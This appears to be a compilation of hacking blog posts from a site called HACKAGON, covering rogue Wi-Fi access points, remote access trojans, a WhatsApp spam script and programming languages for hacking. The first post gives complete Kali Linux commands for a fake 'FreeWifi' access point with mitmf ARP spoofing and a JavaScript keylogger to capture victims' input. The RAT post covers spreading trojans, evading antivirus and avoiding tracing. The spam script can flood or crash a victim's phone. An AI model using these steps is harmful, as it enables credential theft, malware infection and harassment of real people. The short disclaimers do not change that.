A rogue access point (also called rogue AP), is any Wi-Fi access point that is installed on a network but is not authorized for operation on that network and is not under the management of the network administrator. Rogue access points often do not conform to wireless LAN (WLAN) security policies, and additionally, can allow anyone with a Wi-Fi device to connect to your network. So, Learn How To Create Rogue Access Point For Attack In Kali Linux.

Create Rogue Access Point For Attack In Kali Linux

Let’s Understand The Rogue Access Point With Infographics

rogue access point

Steps To Create Rogue Access Point For Attack In Kali Linux

1. Install isc-dhcp-server

apt-get install isc-dhcp-server

2. set monitor mode

airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

3. Configure dhcpd.conf

leafpad /etc/dhcp/dhcpd.conf
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 192.168.2.0 netmask 255.255.255.0 {
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name “FreeWifi”;
option domain-name-servers 61.XXX.XXX.1,61.XXX.XXX.1,192.168.1.1;
range 192.168.2.100 192.168.2.110;
}

4. Create fake AP using airbase-ng

airbase-ng -e FreeWifi -c 6 wlan0mon

5. Configure at0 interface

ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

6. Start DHCP Server

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

7. Run mitmf

mitmf -i at0 –spoof –arp –gateway 192.168.2.1 –jskeylogger –hsts

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best way to Create Rogue Access Point For Attack. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


We can introduce an RAT (aka Remote Administration Tool) as hacker’s plague spreading tool with a heavy vicious bite. Here, HACKAGON will make you learn everything you need to start the “Plague”. But to go further, we need to clear up the basics first so, here we go.

RATs are the so-called magic wand of Hacker’s.

Remote Administration Tool

What Is Remote Administration Tool?

A Remote Administration Tool (RAT) is a piece of software that allows a remote “Operator” to control a system as if he has physical access to that system. While Desktop Sharing and Remote Administration have many legal uses, “RAT” software is usually associated with the criminal or malicious activities such as controlling remote PC’s, stealing victims data, deleting or editing some files. One can infect someone else by sending them a file called “Server”. If and when this server file is opened, it burrows itself deep in the system and starts to run in the background. Further, it may also send the attacker a message every time it’s active like when a computer is turned on.

How To Spread Remote Administration Tool?

Some RATs can spread over P2P (peer to peer) file sharing services (Torrents mostly), messenger and email spams (MSN, Skype, AIM, etc.) while other may tag along hiding behind some other software. The user installs something, clicks “Next” 5–6 times and voila! Without anyone ever finding out the RAT has compromised a system.

How To Control Remote Administration Tool Server?

Once installed, the RAT server can be controlled via an RAT client. Basically, it’s just an application that tracks your RAT’s movements. It tells you how many systems are infected, information on their system, versions of OS and other software, their IP address etc. It shows a whole list of IP addresses which may be connected to immediately. After connecting, you can make the computer do pretty much anything like you can send keylogger, uninstall their antivirus, crash their whole system, etc.

What is port forwarding?

In computer networking, Port Forwarding or port mapping is an application of Network Address Translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall.

If you’re a gamer or are used to download torrents, you must’ve heard “Port Forwarding” as a way to increase download speeds, reduce lag, etc. In general Port forwarding refers to the redirecting of computer signals to follow specific electronic paths into your computer. The logic behind this shit is, if the computer signal finds its way into your computer a few milliseconds quicker, it will add up to be a possibly dramatic speed increase for your game or your downloading. Don’t start jumping around just yet, your internet connection is probably already optimized for maximum performance (It is so, by default).

Example: A Pencil-thin network cable (that goes into the network adapter) at the back of your computer contains 65,536 microscopic pathways inside it. Your network cable is just like a major highway, except your network cable has freaking 65,536 lanes, and there is a tollbooth on each lane. We call each lane as a “Port”. (FYI, 2^16 = 65,536. So, that tells us 2 bytes = 16 bits in all is sort of the “width” of network cables, which gives us 65,536 different possible combinations – hence, the same number of ports.)

Your internet signal is comprised of millions of tiny little cars that travel on these 65,536 lanes. We call these little cars as “Packets”. These packets can travel as quick as the speed of light, but they do observe a stop-and-go set of rules, where they are required to stop at each major network intersection as if it were a border crossing between countries, or connecting to a different ISP. At each intersection, the packet must do three things:

  • Find an open port.
  • Pass the identification test, that will allow it through that port, and if not.
  • Move to the next port and try again, until it is allowed to pass through the toll.

In some cases, packets sent by hackers will be caught and held at the intersection, where they will then be dissolved into random electrons. When this happens, it is called “Packet Filtering” or “Packet Sniffing”. Likewise, if a hacker gains control of a much-used port, he can control every bit of information that passes through it – Read it, modify or even delete it.

All in all, Port Forwarding is when you command your network router to proactively identify and redirect every packet to travel on specific electronic lanes. Instead of having every packet stop at each port in turn until it finds an open port, a router can be programmed to expedite the process by identifying and redirecting packets without having them stop at each port. Your router then acts like a type of hyper-fast traffic policeman who directs traffic in front of the toll booths.

Can An Antivirus Catch An Remote Administration Tool?

Yes, Actually, Hell Yeah! As a hacker, you will find antiviruses blocking your path at every damn step. But, like every problem, this too has a solution – “Encryption”. It’s called making your server “FUD (Fully Undetectable)”.

Example: Typically encrypted formats, let’s say the password protected .zip or .rar files (if they contain malicious software) can be caught by an Antivirus. Making a program FUD does pretty much the same thing, except it does so like a drunkard with OCD (Obsessive-Compulsive Disorder). What I mean is, running the software through an encryption program again and again so that nothing can recognize what it is and it can pass off as random harmless noise. Something called “Hex Editing” is a well-known way to go about doing this. This is a whole different topic in itself. So, more on this later.

Legal Or Illegal?

Well, some RATs are legal, and some are not. Legal are the ones without a backdoor, and they have the ability to close connection anytime.(Backdoor is something that gives the attacker access to the victim’s system without their knowledge). Plus these are not really referred to as RAT’s, that’s just our (hacker’s) dirty language where the Illegal ones are used for hacking and they may possibly steal data (or worse). A few examples are written below:

Legal:

  1. TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
  2. UltraVNC – Remote support software for on demand remote computer support.
  3. Ammyy Admin – Like TeamViewer, Ammyy Admin is another reliable and friendly tool for remote computer access.
  4. Mikogo – Mikogo is an Online Meeting, Web Conferencing, Remote Support tool where you can share your screen with several participants in real-time over the Web.

The above tools while very useful and very legal, require a green light from both the parties involved. That’s the main difference between the ones above and the ones below:

Illegal (Or Barely Legal):

  1. Spy-Net
  2. Cerberus Rat
  3. CyberGate Rat
  4. SubSeven
  5. Turkojan
  6. ProRat

These all are used for one purpose – Causing trouble, to say the least. RATs like the ones above are meant to be stealthy. After all, no hacker will want their victims to get a message like: “Congratulations! You have been infected!” (Or maybe let the Antivirus find it). Use any of these on an actual victim, and you will get a ticket to jail, or, at least, a fine. But these are actually used, and mostly without anyone ever suspecting anything wrong. The thing is, hacking is becoming much more of a serious business than a game. An RAT that simply crashes the OS or formats the hard disk gives nothing to the attacker, So why bother doing it in the first place? RAT’s today are evolving (pun unintended). They are becoming more like “parasites” instead of predators. They may be used for DDOSing (by creating massive botnets with tens of thousands of slave computers), clicking ads in the background (the usual click fraud), increasing blog and youtube “views”, even using the compromised systems to “earn money online”, by pushing surveys, exploiting the websites which offer a pay-per-install model, even “mining” bitcoins (Bitcoins are just a fancy new online currency. Bitcoins can be earned by devoting CPU power, then converted into real money, hence their potential exploitation by using RATs).

What’s DNS Host?

A DNS Hosting is a service that runs Domain Name System Servers. Most, but not all, domain name registrars include DNS hosting service with registration. Free DNS hosting services also exist. Many third-party DNS hosting services provide Dynamic DNS.

In general, Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates meaningful human understandable Domain Names into the Numerical (Binary) Identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.

What Can Remote Administration Tool Do?

  • Manage files (Delete/Modify).
  • Controls Web Browser (Change homepage, open a website, etc.).
  • Get System Information (OS Version, AV name, RAM Memory, Computer name, Network Addresses, etc.).
  • Get Passwords, CC numbers or private data, etc (via Keylogger).
  • View and control remote desktop (Take the screenshot or a snap from the webcam).
  • Record camera, sound (Control mic and camera).
  • Controls victims I/O devices (mouse, keyboard, printer, etc.).

Pretty much everything you can do on your own computer, except play GTA V remotely. (Although technically, you can do that too)

Chances Of Getting Traced?

Yes as well as no because it’s all depends on the slave, it’s really hard to remove the infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace because PC usually got over 300 connections. So don’t worry.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding RAT – Remote Administration Tool.  so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


We know everybody is talking about WhatsApp Hacking nowadays. So here in HACKAGON, we came up with the Spamming idea by adding a JavaScript Code Snippet in the WhatsApp Web by which we can automate the number of messages to send on the respective chat of particular Friend/Group by using WhatsApp Spammer Code.

WhatsApp Spammer

What Is WhatsApp Spammer ??

In simple words we can say that by using WhatsApp Spammer JavaScript Code Snippet, We can send any number of messages to our any WhatsApp Contact/Group without taking the effort of writing and pressing the send button for a particular message again and again.

WhatsApp Spammer JavaScript Code Snippet

// for send function to select input
function dispatch(target, eventType, char) {
var evt = document.createEvent(“TextEvent”);   
evt.initTextEvent (eventType, true, true, window, char, 0, “en-US”);
target.focus();
target.dispatchEvent(evt);
}

// enters input and clicks button
function send(msg){
a=document.getElementsByClassName(‘input’)[1];
dispatch(a,”textInput”,msg);
document.getElementsByClassName(‘icon-send’)[0].click();
}

// For Loop to spam. Edit “i<500” to customize

for(i=0;i<500;i++)
    send(“Let Me Spam You ” +i);

Steps To Use Above Code For WhatsApp Spamming

  1. Open your WhatsApp Web.
  2. Open the respective chat of particular Friend/Group.
  3. Copy the above given code and paste it into your Notepad so that you can edit it for the number of message repetitions as you wish.
  4. Edit the For Loop in code and put the number of messages you want to send/repeat (Here I’ve used “i<500” so the receiver will receive 500 messages ) and you can also edit the message string as you wish.
  5. Now just right-click on the WhatsApp Web and opt for Inspect Element/Inspect or Simply hit the F12 button.
  6. Copy paste the edited code on the Console & hit Enter.
  7. Done!!

Go easy on the Number of Repetitions, As this might crash your Friend’s/Victim’s Phone & WhatsApp.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that we provided the best WhatsApp Hack to have fun with your friend’s. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Programming Languages For Hacking: Every hacking beginner can have plenty of doubts like: “Which programming language should I learn for Hacking ?”, “How to become A professional Pentester / Hacker ?” etc.

Programming Languages For Hacking

When we talk about COMPUTERS then everything related to them depends on programming because, without SOFTWARE, any piece of HARDWARE is nothing but a collection of scrap. But with a beautiful stream of 1’s and 0’s which is also known as BINARY, it can almost literally be pumped full of life. Whatever we see and do on our mobiles and computers and every new gadget as well as applications these days were created by someone, somewhere who night after night tirelessly written the code to create something wonderful for the world.

The users often don’t fully comprehend exactly what goes on behind the scenes of any decent piece of software. For this reason, here’s a little reality check before we get to the main topic. A line of code (LoC) is a single average line in a program and usually contains around 40-50 characters.

  • The Unix 1.0 OS (1970) contained about 10,000 lines of code.
  • An average iOS or android app has approximately 50,000. That is 50,000 lines typed word by word by some coder, and we’re just getting started.
  • Photoshop CS6 clocks in at a freaky 5 million LoC.
  • Firefox browser is of around 10 million.
  • We’ve got Windows 7 at 40 million and guess what? Microsoft office is actually bigger than the parent OS itself (about 45 million LoC).

What’s The Point Of Notifying All This ??

Programming is not actually as we pictured above. we know it takes effort but not that much. The truth is, Lines of Code is a poor way to measure the difficulty of coding. It’s like measuring a person’s success by counting the number of words they’ve spoken, ridiculous and not really related.

The point to state all of the above is to prove wrong all of them who overstate and exaggerate the difficulty of learning how to program. It’s almost always pictured as something unbelievably boring, dry, dull and geeky. As we see in movies, we pictured a programmer as a nerdy guy with huge spectacles sitting in front of the computer tirelessly typing away while all that s/he accomplishes is something wonderful. Undoubtedly, the programming can only be done by someone who thoroughly enjoys it. It’s different for everyone which is why you should actually find out if the programming is for you or not, you need to try it out for yourself.

How Exactly The Programming & Hacker Is Related ??

Programming teaches you the logics and the way to think. It develops the problem-solving capability and most importantly, it is what differentiates you from the SCRIPT KIDDIES. If the hacks are carried out through the tools developed by others, then that person has no rights to be known as a “Hacker”. If you ever tried googling about hacking and gave up soon without finding an answer, you’re not alone. The main reason most hackers are not big on helping others is because they start getting bombarded by noobs asking them to hack FB/Whatsapp/Twitter accounts and explain something so basic and silly that they just give up and start ignoring them. Programming helps you understand how everything in your smarter idiot box comes together. It gives you better knowledge about how to identify and solve any problems by yourself. By knowing programming, you get a better understanding of how vulnerabilities and exploits work.

Most importantly a hacker can code their own tools, scripts, exploits, shell codes, entire applications and modify existing ones according to their own needs. In programming, Hackers can be expected to identify the problems and find the way through them with logical thinking.

Why Programming ??

The first question, many people will ask, is why should I learn any programming language when there are so many tools and Frameworks such as MSF (Metasploit framework) to do my job. All I need to know is how the tool works and what is the purpose of it. The Answer to the question is both yes and no. You can become a Pentester/Hacker without knowing any programming, however, you are not going to become a GOOD pentester/Hacker.

So Knowing Programming Will:

  • Differentiate you from Script Kiddies and Tool Lovers.
  • Help You in Understanding About Vulnerabilities.
  • Help You in writing Your own tools, scripts.
  • Help You in writing exploits, Shell codes etc.
  • Help You modifying Existing scripts, tools according to your needs.

Where To Start ??

All you have to do is to pick a Programming Language and dive in but the question is still there “Which one ?”. There’s simply no right or wrong answer to this question. But the truth is, you have to learn quite a few languages for hacking, preferably as many as possible. Even if you will not need to code in every language, but you should understand how to read it at least. No language is perfect as each one has its pros and cons. You can do the same thing in a million different ways with a dozen programming languages. The time spent analyzing these useless facts could better be spent actually learning something. There is nothing to gain from comparing languages. Actually, the difference between languages is almost like the difference between “Hello”, “Hi” and “Hey”. Although languages like HTML, SQL, Java are used for different things, it really doesn’t matter where you start since you should learn as many languages as you can.

So now that you have understood the importance of knowing programming, the next question in your mind is which programming language should I learn – the answer to this question depends on your interests and goals.

Programming Languages For Hacking:

1# For Web App / Pentesting / Hacking:

HTML: Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don’t know HTML you should first learn it.

JavaScript: Learning JavaScript. It will help you to understand the basics of Cross Site Scripting.

PHP / SQL: The majority of web applications are written using PHP and MySQL. So it is a must to learn PHP.

2# For Writing/Understanding Exploits, Shell Codes, Rootkits etc:

C & C++: More than 60 % of the exploits you will find on the web are written in C & C ++. Learning C & C++ will help you to understand about Buffer overflows, Stack overflow etc – so learning C and C ++ is a must for every Hacker/Pentester.

Assembly: Learning assembly will help you in Writing/understanding Shell codes, it will also help you in Reverse Engineering applications and software’s.

3# For Building Tools And Scripts:

Python: Python is a very powerful high-level language, it’s easy to learn and code, most of the tools and scripts for automation are written in Python. Knowing Python socket programming will help you a lot in Exploit writing.

Ruby: Ruby is an another language which is used to write scripts, tools. Metasploit Framework is written in Ruby. Learning ruby will help you understand the in and outs of MSF.

Bash: Learning Bash is very useful in writing small scripts for automation.

So, we hope that we provided some useful knowledge about Programming Languages used for Hacking so that readers can begin their Hacking career with an ease. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.